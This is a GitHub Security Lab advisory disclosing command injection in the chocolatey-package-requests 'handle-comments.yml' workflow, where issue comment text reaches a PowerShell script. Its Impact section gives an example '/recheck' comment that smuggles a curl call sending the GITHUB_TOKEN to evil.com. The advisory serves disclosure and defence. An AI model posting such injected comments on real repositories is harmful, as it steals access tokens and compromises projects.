skip to content
Back to GitHub.com
Home Bounties CodeQL Research Advisories Get Involved Events
February 3, 2021

GHSL-2020-189: Command injection in chocolatey-community/chocolatey-package-requests workflow

Jaroslav Lobacevski

Coordinated Disclosure Timeline

Summary

The ‘handle-comments.yml’ GitHub workflow is vulnerable to arbitrary command injection.

Product

chocolatey-community/chocolatey-package-requests GitHub repository

Tested Version

handle-comments.yml from the master branch.

Details

Issue: The public GitHub issue comment is used to format a shell command

When a user comments on a public issue with /recheck it automatically starts the handle-comments.yml GitHub workflow. The comment text is used to format a powershell script.

  recheck_pkgs:
    if: ${{ (needs.comments.outputs.success == 'True' || startsWith(github.event.comment.body, '/recheck')) && github.event.issue.state == 'open' }}
...
    steps:
...
      - name: Validate Issue
        run: |
          Import-Module "${{ github.workspace }}\scripts\validation.psm1"
          if ("${{ github.event.comment.body }}" -match "^/recheck") {
            Test-NewIssue -commentId ${{ github.event.comment.id }} -repository "${{ github.event.repository.full_name }}"
          } else {
            Test-NewIssue -issueNumber ${{ github.event.issue.number }} -repository "${{ github.event.repository.full_name }}"
          }

Impact

This vulnerability allows for arbitrary command injection into the powershell script. For example a user may comment on an issue /recheck" -match "^/recheck" -and (curl http://evil.com?t=$Env:GITHUB_TOKEN) -and "/recheck which will exfiltrate the secret GitHub access token to the attacker controlled server, that may lead to the repository being compromised. To make the attack less visible the attacker may modify the comment later.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-189 in any communication regarding this issue.